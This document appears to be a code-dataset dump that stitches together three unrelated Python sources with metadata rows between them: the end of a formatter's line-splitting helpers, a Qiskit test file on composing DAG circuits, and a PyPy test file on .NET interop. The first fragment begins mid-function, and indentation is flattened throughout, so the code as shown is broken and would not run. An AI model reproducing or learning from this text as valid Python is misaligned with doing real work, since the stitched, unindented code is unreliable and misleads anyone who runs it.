"""
if not line_str:
line_str = line_to_string(line)
return (
len(line_str) <= line_length
and "\n" not in line_str # multiline strings
and not line.contains_standalone_comments()
)
def can_be_split(line: Line) -> bool:
"""Return False if the line cannot be split *for sure*.
This is not an exhaustive search but a cheap heuristic that we can use to
avoid some unfortunate formattings (mostly around wrapping unsplittable code
in unnecessary parentheses).
"""
leaves = line.leaves
if len(leaves) < 2:
return False
if leaves[0].type == token.STRING and leaves[1].type == token.DOT:
call_count = 0
dot_count = 0
next = leaves[-1]
for leaf in leaves[-2::-1]:
if leaf.type in OPENING_BRACKETS:
if next.type not in CLOSING_BRACKETS:
return False
call_count += 1
elif leaf.type == token.DOT:
dot_count += 1
elif leaf.type == token.NAME:
if not (next.type == token.DOT or next.type in OPENING_BRACKETS):
return False
elif leaf.type not in CLOSING_BRACKETS:
return False
if dot_count > 1 and call_count > 1:
return False
return True
def can_omit_invisible_parens(
line: Line,
line_length: int,
omit_on_explode: Collection[LeafID] = (),
) -> bool:
"""Does `line` have a shape safe to reformat without optional parens around it?
Returns True for only a subset of potentially nice looking formattings but
the point is to not return false positives that end up producing lines that
are too long.
"""
bt = line.bracket_tracker
if not bt.delimiters:
# Without delimiters the optional parentheses are useless.
return True
max_priority = bt.max_delimiter_priority()
if bt.delimiter_count_with_priority(max_priority) > 1:
# With more than one delimiter of a kind the optional parentheses read better.
return False
if max_priority == DOT_PRIORITY:
# A single stranded method call doesn't require optional parentheses.
return True
assert len(line.leaves) >= 2, "Stranded delimiter"
# With a single delimiter, omit if the expression starts or ends with
# a bracket.
first = line.leaves[0]
second = line.leaves[1]
if first.type in OPENING_BRACKETS and second.type not in CLOSING_BRACKETS:
if _can_omit_opening_paren(line, first=first, line_length=line_length):
return True
# Note: we are not returning False here because a line might have *both*
# a leading opening bracket and a trailing closing bracket. If the
# opening bracket doesn't match our rule, maybe the closing will.
penultimate = line.leaves[-2]
last = line.leaves[-1]
if line.magic_trailing_comma:
try:
penultimate, last = last_two_except(line.leaves, omit=omit_on_explode)
except LookupError:
# Turns out we'd omit everything. We cannot skip the optional parentheses.
return False
if (
last.type == token.RPAR
or last.type == token.RBRACE
or (
# don't use indexing for omitting optional parentheses;
# it looks weird
last.type == token.RSQB
and last.parent
and last.parent.type != syms.trailer
)
):
if penultimate.type in OPENING_BRACKETS:
# Empty brackets don't help.
return False
if is_multiline_string(first):
# Additional wrapping of a multiline string in this situation is
# unnecessary.
return True
if line.magic_trailing_comma and penultimate.type == token.COMMA:
# The rightmost non-omitted bracket pair is the one we want to explode on.
return True
if _can_omit_closing_paren(line, last=last, line_length=line_length):
return True
return False
def _can_omit_opening_paren(line: Line, *, first: Leaf, line_length: int) -> bool:
"""See `can_omit_invisible_parens`."""
remainder = False
length = 4 * line.depth
_index = -1
for _index, leaf, leaf_length in line.enumerate_with_length():
if leaf.type in CLOSING_BRACKETS and leaf.opening_bracket is first:
remainder = True
if remainder:
length += leaf_length
if length > line_length:
break
if leaf.type in OPENING_BRACKETS:
# There are brackets we can further split on.
remainder = False
else:
# checked the entire string and line length wasn't exceeded
if len(line.leaves) == _index + 1:
return True
return False
def _can_omit_closing_paren(line: Line, *, last: Leaf, line_length: int) -> bool:
"""See `can_omit_invisible_parens`."""
length = 4 * line.depth
seen_other_brackets = False
for _index, leaf, leaf_length in line.enumerate_with_length():
length += leaf_length
if leaf is last.opening_bracket:
if seen_other_brackets or length <= line_length:
return True
elif leaf.type in OPENING_BRACKETS:
# There are brackets we can further split on.
seen_other_brackets = True
return False
def line_to_string(line: Line) -> str:
"""Returns the string representation of @line.
WARNING: This is known to be computationally expensive.
"""
return str(line).strip("\n")
| 35.247297
| 88
| 0.608136
|
f689fbbf7e0cf4e062a9e54832f0388f631aa7f5
| 16,700
|
py
|
Python
|
test/python/dagcircuit/test_compose.py
|
ajavadia/qiskit-sdk-py
|
a59e8e6be1793197e19998c1f7dcfc45e6f2f3af
|
[
"Apache-2.0"
] | 11
|
2019-06-27T09:53:29.000Z
|
2021-03-02T04:40:30.000Z
|
test/python/dagcircuit/test_compose.py
|
ajavadia/qiskit-sdk-py
|
a59e8e6be1793197e19998c1f7dcfc45e6f2f3af
|
[
"Apache-2.0"
] | 12
|
2018-09-21T12:02:18.000Z
|
2018-09-25T09:14:59.000Z
|
test/python/dagcircuit/test_compose.py
|
ajavadia/qiskit-sdk-py
|
a59e8e6be1793197e19998c1f7dcfc45e6f2f3af
|
[
"Apache-2.0"
] | 4
|
2019-08-05T15:35:33.000Z
|
2020-09-18T18:55:02.000Z
|
# This code is part of Qiskit.
#
# (C) Copyright IBM 2017.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Test for the DAGCircuit object"""
import unittest
from qiskit.circuit import QuantumRegister, ClassicalRegister, QuantumCircuit
from qiskit.converters import circuit_to_dag, dag_to_circuit
from qiskit.dagcircuit.exceptions import DAGCircuitError
from qiskit.test import QiskitTestCase
class TestDagCompose(QiskitTestCase):
"""Test composition of two dags"""
def setUp(self):
super().setUp()
qreg1 = QuantumRegister(3, 'lqr_1')
qreg2 = QuantumRegister(2, 'lqr_2')
creg = ClassicalRegister(2, 'lcr')
self.circuit_left = QuantumCircuit(qreg1, qreg2, creg)
self.circuit_left.h(qreg1[0])
self.circuit_left.x(qreg1[1])
self.circuit_left.p(0.1, qreg1[2])
self.circuit_left.cx(qreg2[0], qreg2[1])
self.left_qubit0 = qreg1[0]
self.left_qubit1 = qreg1[1]
self.left_qubit2 = qreg1[2]
self.left_qubit3 = qreg2[0]
self.left_qubit4 = qreg2[1]
self.left_clbit0 = creg[0]
self.left_clbit1 = creg[1]
self.condition1 = (creg, 1)
self.condition2 = (creg, 2)
def test_compose_inorder(self):
"""Composing two dags of the same width, default order.
┌───┐
lqr_1_0: |0>──┤ H ├─── rqr_0: |0>──■───────
├───┤ │ ┌───┐
lqr_1_1: |0>──┤ X ├─── rqr_1: |0>──┼──┤ X ├
┌─┴───┴──┐ │ ├───┤
lqr_1_2: |0>┤ P(0.1) ├ + rqr_2: |0>──┼──┤ Y ├ =
└────────┘ ┌─┴─┐└───┘
lqr_2_0: |0>────■───── rqr_3: |0>┤ X ├─────
┌─┴─┐ └───┘┌───┐
lqr_2_1: |0>──┤ X ├─── rqr_4: |0>─────┤ Z ├
└───┘ └───┘
lcr_0: 0 ═══════════
lcr_1: 0 ═══════════
┌───┐
lqr_1_0: |0>──┤ H ├─────■───────
├───┤ │ ┌───┐
lqr_1_1: |0>──┤ X ├─────┼──┤ X ├
┌─┴───┴──┐ │ ├───┤
lqr_1_2: |0>┤ P(0.1) ├──┼──┤ Y ├
└────────┘┌─┴─┐└───┘
lqr_2_0: |0>────■─────┤ X ├─────
┌─┴─┐ └───┘┌───┐
lqr_2_1: |0>──┤ X ├────────┤ Z ├
└───┘ └───┘
lcr_0: 0 ═══════════════════════
lcr_1: 0 ═══════════════════════
"""
qreg = QuantumRegister(5, 'rqr')
circuit_right = QuantumCircuit(qreg)
circuit_right.cx(qreg[0], qreg[3])
circuit_right.x(qreg[1])
circuit_right.y(qreg[2])
circuit_right.z(qreg[4])
dag_left = circuit_to_dag(self.circuit_left)
dag_right = circuit_to_dag(circuit_right)
# default wiring: i <- i
dag_left.compose(dag_right)
circuit_composed = dag_to_circuit(dag_left)
circuit_expected = self.circuit_left.copy()
circuit_expected.cx(self.left_qubit0, self.left_qubit3)
circuit_expected.x(self.left_qubit1)
circuit_expected.y(self.left_qubit2)
circuit_expected.z(self.left_qubit4)
self.assertEqual(circuit_composed, circuit_expected)
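        # Illustrative note (not part of the original test): the same default
        # i <- i wiring is also available at the circuit level, since
        # QuantumCircuit provides a compose method of its own, e.g.
        #
        #     composed = self.circuit_left.compose(circuit_right)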
def test_compose_inorder_smaller(self):
"""Composing with a smaller RHS dag, default order.
┌───┐ ┌─────┐
lqr_1_0: |0>──┤ H ├─── rqr_0: |0>──■──┤ Tdg ├
├───┤ ┌─┴─┐└─────┘
lqr_1_1: |0>──┤ X ├─── rqr_1: |0>┤ X ├───────
┌─┴───┴──┐ └───┘
lqr_1_2: |0>┤ P(0.1) ├ + =
└────────┘
lqr_2_0: |0>────■─────
┌─┴─┐
lqr_2_1: |0>──┤ X ├───
└───┘
lcr_0: 0 ══════════════
lcr_1: 0 ══════════════
┌───┐ ┌─────┐
lqr_1_0: |0>──┤ H ├─────■──┤ Tdg ├
├───┤ ┌─┴─┐└─────┘
lqr_1_1: |0>──┤ X ├───┤ X ├───────
┌─┴───┴──┐└───┘
lqr_1_2: |0>┤ P(0.1) ├────────────
└────────┘
lqr_2_0: |0>────■─────────────────
┌─┴─┐
lqr_2_1: |0>──┤ X ├───────────────
└───┘
lcr_0: 0 ═════════════════════════
lcr_1: 0 ═════════════════════════
"""
qreg = QuantumRegister(2, 'rqr')
circuit_right = QuantumCircuit(qreg)
circuit_right.cx(qreg[0], qreg[1])
circuit_right.tdg(qreg[0])
dag_left = circuit_to_dag(self.circuit_left)
dag_right = circuit_to_dag(circuit_right)
# default wiring: i <- i
dag_left.compose(dag_right)
circuit_composed = dag_to_circuit(dag_left)
circuit_expected = self.circuit_left.copy()
circuit_expected.cx(self.left_qubit0, self.left_qubit1)
circuit_expected.tdg(self.left_qubit0)
self.assertEqual(circuit_composed, circuit_expected)
def test_compose_permuted(self):
"""Composing two dags of the same width, permuted wires.
┌───┐
lqr_1_0: |0>──┤ H ├─── rqr_0: |0>──■───────
├───┤ │ ┌───┐
lqr_1_1: |0>──┤ X ├─── rqr_1: |0>──┼──┤ X ├
┌─┴───┴──┐ │ ├───┤
lqr_1_2: |0>┤ P(0.1) ├ rqr_2: |0>──┼──┤ Y ├
└────────┘ ┌─┴─┐└───┘
lqr_2_0: |0>────■───── + rqr_3: |0>┤ X ├───── =
┌─┴─┐ └───┘┌───┐
lqr_2_1: |0>──┤ X ├─── rqr_4: |0>─────┤ Z ├
└───┘ └───┘
lcr_0: 0 ═════════════
lcr_1: 0 ═════════════
┌───┐ ┌───┐
lqr_1_0: |0>──┤ H ├───┤ Z ├
├───┤ ├───┤
lqr_1_1: |0>──┤ X ├───┤ X ├
┌─┴───┴──┐├───┤
lqr_1_2: |0>┤ P(0.1) ├┤ Y ├
└────────┘└───┘
lqr_2_0: |0>────■───────■──
┌─┴─┐ ┌─┴─┐
lqr_2_1: |0>──┤ X ├───┤ X ├
└───┘ └───┘
lcr_0: 0 ══════════════════
lcr_1: 0 ══════════════════
"""
qreg = QuantumRegister(5, 'rqr')
circuit_right = QuantumCircuit(qreg)
circuit_right.cx(qreg[0], qreg[3])
circuit_right.x(qreg[1])
circuit_right.y(qreg[2])
circuit_right.z(qreg[4])
dag_left = circuit_to_dag(self.circuit_left)
dag_right = circuit_to_dag(circuit_right)
# permuted wiring
dag_left.compose(dag_right, qubits=[self.left_qubit3,
self.left_qubit1,
self.left_qubit2,
self.left_qubit4,
self.left_qubit0])
circuit_composed = dag_to_circuit(dag_left)
circuit_expected = self.circuit_left.copy()
circuit_expected.z(self.left_qubit0)
circuit_expected.x(self.left_qubit1)
circuit_expected.y(self.left_qubit2)
circuit_expected.cx(self.left_qubit3, self.left_qubit4)
self.assertEqual(circuit_composed, circuit_expected)
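        # Illustrative note (not in the original test): the `qubits` list maps
        # right-circuit wire i onto qubits[i] of the left, so here
        #
        #     rqr_0 -> left_qubit3, rqr_1 -> left_qubit1, ..., rqr_4 -> left_qubit0
        #
        # which is why CX(rqr_0, rqr_3) lands on (left_qubit3, left_qubit4).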
def test_compose_permuted_smaller(self):
"""Composing with a smaller RHS dag, and permuted wires.
┌───┐ ┌─────┐
lqr_1_0: |0>──┤ H ├─── rqr_0: |0>──■──┤ Tdg ├
├───┤ ┌─┴─┐└─────┘
lqr_1_1: |0>──┤ X ├─── rqr_1: |0>┤ X ├───────
┌─┴───┴──┐ └───┘
lqr_1_2: |0>┤ P(0.1) ├ + =
└────────┘
lqr_2_0: |0>────■─────
┌─┴─┐
lqr_2_1: |0>──┤ X ├───
└───┘
lcr_0: 0 ═════════════
lcr_1: 0 ═════════════
┌───┐
lqr_1_0: |0>──┤ H ├───────────────
├───┤
lqr_1_1: |0>──┤ X ├───────────────
┌─┴───┴──┐┌───┐
lqr_1_2: |0>┤ P(0.1) ├┤ X ├───────
└────────┘└─┬─┘┌─────┐
lqr_2_0: |0>────■───────■──┤ Tdg ├
┌─┴─┐ └─────┘
lqr_2_1: |0>──┤ X ├───────────────
└───┘
lcr_0: 0 ═════════════════════════
lcr_1: 0 ═════════════════════════
"""
qreg = QuantumRegister(2, 'rqr')
circuit_right = QuantumCircuit(qreg)
circuit_right.cx(qreg[0], qreg[1])
circuit_right.tdg(qreg[0])
dag_left = circuit_to_dag(self.circuit_left)
dag_right = circuit_to_dag(circuit_right)
# permuted wiring of subset
dag_left.compose(dag_right, qubits=[self.left_qubit3, self.left_qubit2])
circuit_composed = dag_to_circuit(dag_left)
circuit_expected = self.circuit_left.copy()
circuit_expected.cx(self.left_qubit3, self.left_qubit2)
circuit_expected.tdg(self.left_qubit3)
self.assertEqual(circuit_composed, circuit_expected)
def test_compose_conditional(self):
"""Composing on classical bits.
┌───┐ ┌───┐ ┌─┐
lqr_1_0: |0>──┤ H ├─── rqr_0: ────────┤ H ├─┤M├───
├───┤ ┌───┐ └─┬─┘ └╥┘┌─┐
lqr_1_1: |0>──┤ X ├─── rqr_1: ─┤ X ├────┼────╫─┤M├
┌─┴───┴──┐ └─┬─┘ │ ║ └╥┘
lqr_1_2: |0>┤ P(0.1) ├ + ┌──┴──┐┌──┴──┐ ║ ║
└────────┘ rcr_0: ╡ ╞╡ ╞═╩══╬═
lqr_2_0: |0>────■───── │ = 2 ││ = 1 │ ║
┌─┴─┐ rcr_1: ╡ ╞╡ ╞════╩═
lqr_2_1: |0>──┤ X ├─── └─────┘└─────┘
└───┘
lcr_0: 0 ═════════════
lcr_1: 0 ═════════════
┌───┐
lqr_1_0: ──┤ H ├───────────────────────
├───┤ ┌───┐ ┌─┐
lqr_1_1: ──┤ X ├───────────┤ H ├────┤M├
┌─┴───┴──┐ └─┬─┘ └╥┘
lqr_1_2: ┤ P(0.1) ├──────────┼───────╫─
└────────┘ │ ║
lqr_2_0: ────■───────────────┼───────╫─
┌─┴─┐ ┌───┐ │ ┌─┐ ║
lqr_2_1: ──┤ X ├────┤ X ├────┼───┤M├─╫─
└───┘ └─┬─┘ │ └╥┘ ║
┌──┴──┐┌──┴──┐ ║ ║
lcr_0: ════════════╡ ╞╡ ╞═╩══╬═
│ = 1 ││ = 2 │ ║
lcr_1: ════════════╡ ╞╡ ╞════╩═
└─────┘└─────┘
"""
qreg = QuantumRegister(2, 'rqr')
creg = ClassicalRegister(2, 'rcr')
circuit_right = QuantumCircuit(qreg, creg)
circuit_right.x(qreg[1]).c_if(creg, 2)
circuit_right.h(qreg[0]).c_if(creg, 1)
circuit_right.measure(qreg, creg)
dag_left = circuit_to_dag(self.circuit_left)
dag_right = circuit_to_dag(circuit_right)
# permuted subset of qubits and clbits
dag_left.compose(dag_right, qubits=[self.left_qubit1, self.left_qubit4],
clbits=[self.left_clbit1, self.left_clbit0])
circuit_composed = dag_to_circuit(dag_left)
circuit_expected = self.circuit_left.copy()
circuit_expected.x(self.left_qubit4).c_if(*self.condition1)
circuit_expected.h(self.left_qubit1).c_if(*self.condition2)
circuit_expected.measure(self.left_qubit4, self.left_clbit0)
circuit_expected.measure(self.left_qubit1, self.left_clbit1)
self.assertEqual(circuit_composed, circuit_expected)
def test_compose_classical(self):
"""Composing on classical bits.
┌───┐ ┌─────┐┌─┐
lqr_1_0: |0>──┤ H ├─── rqr_0: |0>──■──┤ Tdg ├┤M├
├───┤ ┌─┴─┐└─┬─┬─┘└╥┘
lqr_1_1: |0>──┤ X ├─── rqr_1: |0>┤ X ├──┤M├───╫─
┌─┴───┴──┐ └───┘ └╥┘ ║
lqr_1_2: |0>┤ P(0.1) ├ + rcr_0: 0 ════════╬════╩═ =
└────────┘ ║
lqr_2_0: |0>────■───── rcr_1: 0 ════════╩══════
┌─┴─┐
lqr_2_1: |0>──┤ X ├───
└───┘
lcr_0: 0 ═════════════
lcr_1: 0 ═════════════
┌───┐
lqr_1_0: |0>──┤ H ├──────────────────
├───┤ ┌─────┐┌─┐
lqr_1_1: |0>──┤ X ├─────■──┤ Tdg ├┤M├
┌─┴───┴──┐ │ └─────┘└╥┘
lqr_1_2: |0>┤ P(0.1) ├──┼──────────╫─
└────────┘ │ ║
lqr_2_0: |0>────■───────┼──────────╫─
┌─┴─┐ ┌─┴─┐ ┌─┐ ║
lqr_2_1: |0>──┤ X ├───┤ X ├──┤M├───╫─
└───┘ └───┘ └╥┘ ║
lcr_0: 0 ══════════════════╩════╬═
║
lcr_1: 0 ═══════════════════════╩═
"""
qreg = QuantumRegister(2, 'rqr')
creg = ClassicalRegister(2, 'rcr')
circuit_right = QuantumCircuit(qreg, creg)
circuit_right.cx(qreg[0], qreg[1])
circuit_right.tdg(qreg[0])
circuit_right.measure(qreg, creg)
dag_left = circuit_to_dag(self.circuit_left)
dag_right = circuit_to_dag(circuit_right)
# permuted subset of qubits and clbits
dag_left.compose(dag_right, qubits=[self.left_qubit1, self.left_qubit4],
clbits=[self.left_clbit1, self.left_clbit0])
circuit_composed = dag_to_circuit(dag_left)
circuit_expected = self.circuit_left.copy()
circuit_expected.cx(self.left_qubit1, self.left_qubit4)
circuit_expected.tdg(self.left_qubit1)
circuit_expected.measure(self.left_qubit4, self.left_clbit0)
circuit_expected.measure(self.left_qubit1, self.left_clbit1)
self.assertEqual(circuit_composed, circuit_expected)
def test_compose_condition_multiple_classical(self):
"""Compose a circuit with more than one creg.
┌───┐ ┌───┐
q5_0: q5_0: ─┤ H ├─ q5_0: ─┤ H ├─
└─┬─┘ └─┬─┘
┌──┴──┐ ┌──┴──┐
c0: + c0: 1/╡ = 1 ╞ = c0: 1/╡ = 1 ╞
└─────┘ └─────┘
c1: c1: 1/═══════ c1: 1/═══════
"""
# ref: https://github.com/Qiskit/qiskit-terra/issues/4964
qreg = QuantumRegister(1)
creg1 = ClassicalRegister(1)
creg2 = ClassicalRegister(1)
circuit_left = QuantumCircuit(qreg, creg1, creg2)
circuit_right = QuantumCircuit(qreg, creg1, creg2)
circuit_right.h(0).c_if(creg1, 1)
dag_left = circuit_to_dag(circuit_left)
dag_right = circuit_to_dag(circuit_right)
dag_composed = dag_left.compose(dag_right,
qubits=[0],
clbits=[0, 1],
inplace=False)
dag_expected = circuit_to_dag(circuit_right.copy())
self.assertEqual(dag_composed, dag_expected)
def test_compose_raises_if_splitting_condition_creg(self):
"""Verify compose raises if a condition is mapped to more than one creg.
┌───┐
q_0: q_0: ─┤ H ├─
└─┬─┘
c0: 1/ + ┌──┴──┐ = DAGCircuitError
c: 2/╡ = 2 ╞
c1: 1/ └─────┘
"""
qreg = QuantumRegister(1)
creg1 = ClassicalRegister(1)
creg2 = ClassicalRegister(1)
circuit_left = QuantumCircuit(qreg, creg1, creg2)
wide_creg = ClassicalRegister(2)
circuit_right = QuantumCircuit(qreg, wide_creg)
circuit_right.h(0).c_if(wide_creg, 2)
with self.assertRaisesRegex(DAGCircuitError, 'more than one creg'):
circuit_left.compose(circuit_right)
if __name__ == '__main__':
unittest.main()
| 37.52809
| 80
| 0.404132
|
64c46cd8846e151b636f1b332a678efbc3a4928f
| 21,645
|
py
|
Python
|
pypy/translator/cli/test/test_dotnet.py
|
camillobruni/pygirl
|
ddbd442d53061d6ff4af831c1eab153bcc771b5a
|
[
"MIT"
] | 12
|
2016-01-06T07:10:28.000Z
|
2021-05-13T23:02:02.000Z
|
pypy/translator/cli/test/test_dotnet.py
|
camillobruni/pygirl
|
ddbd442d53061d6ff4af831c1eab153bcc771b5a
|
[
"MIT"
] | null | null | null |
pypy/translator/cli/test/test_dotnet.py
|
camillobruni/pygirl
|
ddbd442d53061d6ff4af831c1eab153bcc771b5a
|
[
"MIT"
] | 2
|
2016-07-29T07:09:50.000Z
|
2016-10-16T08:50:26.000Z
|
import py
from pypy.annotation.annrpython import RPythonAnnotator
from pypy.annotation import model as annmodel
from pypy.rpython.ootypesystem import ootype
from pypy.rpython.ootypesystem.ootype import meth, Meth, Char, Signed, Float, String,\
ROOT, overload, Instance, new
from pypy.translator.cli.test.runtest import CliTest
from pypy.translator.cli.dotnet import SomeCliClass, SomeCliStaticMethod,\
NativeInstance, CLR, box, unbox, OverloadingResolver, NativeException,\
native_exc, new_array, init_array, typeof, eventhandler, clidowncast,\
fieldinfo_for_const, classof
System = CLR.System
ArrayList = CLR.System.Collections.ArrayList
OpCodes = System.Reflection.Emit.OpCodes
DynamicMethod = System.Reflection.Emit.DynamicMethod
Utils = CLR.pypy.runtime.Utils
FUNCTYPE = ootype.StaticMethod([ootype.Signed, ootype.Signed], ootype.Signed)
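# (illustrative comment, not in the original source) FUNCTYPE models a .NET
# delegate type taking two Signed (int) arguments and returning Signed; it is
# used below with typeof()/classof() and by the DynamicMethod tests that emit
# an "add" delegate at runtime.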
class TestDotnetAnnotation(object):
def test_overloaded_meth_string(self):
C = Instance("test", ROOT, {},
{'foo': overload(meth(Meth([Char], Signed)),
meth(Meth([String], Float)),
resolver=OverloadingResolver),
'bar': overload(meth(Meth([Signed], Char)),
meth(Meth([Float], String)),
resolver=OverloadingResolver)})
def fn1():
return new(C).foo('a')
def fn2():
return new(C).foo('aa')
def fn3(x):
return new(C).bar(x)
a = RPythonAnnotator()
assert isinstance(a.build_types(fn1, []), annmodel.SomeInteger)
assert isinstance(a.build_types(fn2, []), annmodel.SomeFloat)
assert isinstance(a.build_types(fn3, [int]), annmodel.SomeChar)
assert isinstance(a.build_types(fn3, [float]), annmodel.SomeString)
def test_class(self):
def fn():
return System.Math
a = RPythonAnnotator()
s = a.build_types(fn, [])
assert isinstance(s, SomeCliClass)
assert s.const is System.Math
def test_fullname(self):
def fn():
return CLR.System.Math
a = RPythonAnnotator()
s = a.build_types(fn, [])
assert isinstance(s, SomeCliClass)
assert s.const is System.Math
def test_staticmeth(self):
def fn():
return System.Math.Abs
a = RPythonAnnotator()
s = a.build_types(fn, [])
assert isinstance(s, SomeCliStaticMethod)
assert s.cli_class is System.Math
assert s.meth_name == 'Abs'
def test_staticmeth_call(self):
def fn1():
return System.Math.Abs(42)
def fn2():
return System.Math.Abs(42.5)
a = RPythonAnnotator()
assert type(a.build_types(fn1, [])) is annmodel.SomeInteger
assert type(a.build_types(fn2, [])) is annmodel.SomeFloat
def test_new_instance(self):
def fn():
return ArrayList()
a = RPythonAnnotator()
s = a.build_types(fn, [])
assert isinstance(s, annmodel.SomeOOInstance)
assert isinstance(s.ootype, NativeInstance)
assert s.ootype._name == '[mscorlib]System.Collections.ArrayList'
def test_box(self):
def fn():
return box(42)
a = RPythonAnnotator()
s = a.build_types(fn, [])
assert isinstance(s, annmodel.SomeOOInstance)
assert s.ootype._name == '[mscorlib]System.Object'
assert not s.can_be_None
def test_box_can_be_None(self):
def fn(flag):
if flag:
return box(42)
else:
return box(None)
a = RPythonAnnotator()
s = a.build_types(fn, [bool])
assert isinstance(s, annmodel.SomeOOInstance)
assert s.ootype._name == '[mscorlib]System.Object'
assert s.can_be_None
def test_unbox(self):
def fn():
x = box(42)
return unbox(x, ootype.Signed)
a = RPythonAnnotator()
s = a.build_types(fn, [])
assert isinstance(s, annmodel.SomeInteger)
def test_unbox_can_be_None(self):
class Foo:
pass
def fn():
x = box(42)
return unbox(x, Foo)
a = RPythonAnnotator()
s = a.build_types(fn, [])
assert isinstance(s, annmodel.SomeInstance)
assert s.can_be_None
def test_array(self):
def fn():
x = ArrayList()
return x.ToArray()
a = RPythonAnnotator()
s = a.build_types(fn, [])
assert isinstance(s, annmodel.SomeOOInstance)
assert s.ootype._isArray
assert s.ootype._ELEMENT._name == '[mscorlib]System.Object'
def test_array_getitem(self):
def fn():
x = ArrayList().ToArray()
return x[0]
a = RPythonAnnotator()
s = a.build_types(fn, [])
assert isinstance(s, annmodel.SomeOOInstance)
assert s.ootype._name == '[mscorlib]System.Object'
def test_mix_None_and_instance(self):
def fn(x):
if x:
return None
else:
return box(42)
a = RPythonAnnotator()
s = a.build_types(fn, [bool])
assert isinstance(s, annmodel.SomeOOInstance)
assert s.can_be_None == True
def test_box_instance(self):
class Foo:
pass
def fn():
return box(Foo())
a = RPythonAnnotator()
s = a.build_types(fn, [])
assert isinstance(s, annmodel.SomeOOInstance)
assert s.ootype._name == '[mscorlib]System.Object'
def test_unbox_instance(self):
class Foo:
pass
def fn():
boxed = box(Foo())
return unbox(boxed, Foo)
a = RPythonAnnotator()
s = a.build_types(fn, [])
assert isinstance(s, annmodel.SomeInstance)
assert s.classdef.name.endswith('Foo')
def test_can_be_None(self):
def fn():
ttype = System.Type.GetType('foo')
return ttype.get_Namespace()
a = RPythonAnnotator()
s = a.build_types(fn, [])
assert isinstance(s, annmodel.SomeString)
assert s.can_be_None
class TestDotnetRtyping(CliTest):
def _skip_pythonnet(self, msg):
pass
def test_staticmeth_call(self):
def fn(x):
return System.Math.Abs(x)
assert self.interpret(fn, [-42]) == 42
def test_staticmeth_overload(self):
self._skip_pythonnet('Pythonnet bug!')
def fn(x, y):
return System.Math.Abs(x), System.Math.Abs(y)
res = self.interpret(fn, [-42, -42.5])
item0, item1 = self.ll_to_tuple(res)
assert item0 == 42
assert item1 == 42.5
def test_tostring(self):
StringBuilder = CLR.System.Text.StringBuilder
def fn():
x = StringBuilder()
x.Append(box("foo")).Append(box("bar"))
return x.ToString()
res = self.ll_to_string(self.interpret(fn, []))
assert res == 'foobar'
def test_box(self):
def fn():
x = ArrayList()
x.Add(box(42))
x.Add(box('Foo'))
return x.get_Count()
assert self.interpret(fn, []) == 2
def test_whitout_box(self):
def fn():
x = ArrayList()
            x.Add(42)  # note: we have forgotten to call box()
py.test.raises(TypeError, self.interpret, fn, [])
def test_unbox(self):
def fn():
x = ArrayList()
x.Add(box(42))
return unbox(x.get_Item(0), ootype.Signed)
assert self.interpret(fn, []) == 42
def test_unbox_string(self):
def fn():
x = ArrayList()
x.Add(box('foo'))
return unbox(x.get_Item(0), ootype.String)
assert self.interpret(fn, []) == 'foo'
def test_box_method(self):
def fn():
x = box(42)
t = x.GetType()
return t.get_Name()
res = self.interpret(fn, [])
assert res == 'Int32'
def test_box_object(self):
def fn():
return box(System.Object()).ToString()
res = self.interpret(fn, [])
assert res == 'System.Object'
def test_array(self):
def fn():
x = ArrayList()
x.Add(box(42))
array = x.ToArray()
return unbox(array[0], ootype.Signed)
assert self.interpret(fn, []) == 42
def test_new_array(self):
def fn():
x = new_array(System.Object, 2)
x[0] = box(42)
x[1] = box(43)
return unbox(x[0], ootype.Signed) + unbox(x[1], ootype.Signed)
assert self.interpret(fn, []) == 42+43
def test_init_array(self):
def fn():
x = init_array(System.Object, box(42), box(43))
return unbox(x[0], ootype.Signed) + unbox(x[1], ootype.Signed)
assert self.interpret(fn, []) == 42+43
def test_array_setitem_None(self):
py.test.skip('Mono bug :-(')
def fn():
x = init_array(System.Object, box(42), box(43))
x[0] = None
return x[0]
assert self.interpret(fn, []) is None
def test_array_length(self):
def fn():
x = init_array(System.Object, box(42), box(43))
return len(x)
assert self.interpret(fn, []) == 2
def test_null(self):
def fn():
return System.Object.Equals(None, None)
assert self.interpret(fn, []) == True
def test_null_bound_method(self):
def fn():
x = ArrayList()
x.Add(None)
return x.get_Item(0)
assert self.interpret(fn, []) is None
def test_native_exception_precise(self):
ArgumentOutOfRangeException = NativeException(CLR.System.ArgumentOutOfRangeException)
def fn():
x = ArrayList()
try:
x.get_Item(0)
return False
except ArgumentOutOfRangeException:
return True
assert self.interpret(fn, []) == True
def test_native_exception_superclass(self):
SystemException = NativeException(CLR.System.Exception)
def fn():
x = ArrayList()
try:
x.get_Item(0)
return False
except SystemException:
return True
assert self.interpret(fn, []) == True
def test_native_exception_object(self):
SystemException = NativeException(CLR.System.Exception)
def fn():
x = ArrayList()
try:
x.get_Item(0)
return "Impossible!"
except SystemException, e:
ex = native_exc(e)
return ex.get_Message()
res = self.ll_to_string(self.interpret(fn, []))
assert res.startswith("Index is less than 0")
def test_native_exception_invoke(self):
TargetInvocationException = NativeException(CLR.System.Reflection.TargetInvocationException)
def fn():
x = ArrayList()
t = x.GetType()
meth = t.GetMethod('get_Item')
args = init_array(System.Object, box(0))
try:
meth.Invoke(x, args)
return "Impossible!"
except TargetInvocationException, e:
inner = native_exc(e).get_InnerException()
message = str(inner.get_Message())
return message
res = self.ll_to_string(self.interpret(fn, []))
assert res.startswith("Index is less than 0")
def test_typeof(self):
def fn():
x = box(42)
return x.GetType() == typeof(System.Int32)
res = self.interpret(fn, [])
assert res is True
def test_typeof_pypylib(self):
DelegateType = CLR.pypy.test.DelegateType_int__int_2
def fn():
return typeof(DelegateType) is not None
res = self.interpret(fn, [])
assert res is True
def test_typeof_functype(self):
# this test is overridden in TestPythonnet
def fn():
t = typeof(FUNCTYPE)
return t.get_Name()
res = self.interpret(fn, [])
assert res.startswith('StaticMethod__')
def test_clidowncast(self):
def fn():
a = ArrayList()
b = ArrayList()
a.Add(b)
c = a.get_Item(0) # type of c is Object
c = clidowncast(c, ArrayList)
c.Add(None)
return c.get_Item(0)
res = self.interpret(fn, [])
assert res is None
def test_clidowncast_lltype(self):
ARRAY_LIST = ArrayList._INSTANCE
def fn():
a = ArrayList()
b = ArrayList()
a.Add(b)
c = a.get_Item(0) # type of c is Object
c = clidowncast(c, ARRAY_LIST)
c.Add(None)
return c.get_Item(0)
res = self.interpret(fn, [])
assert res is None
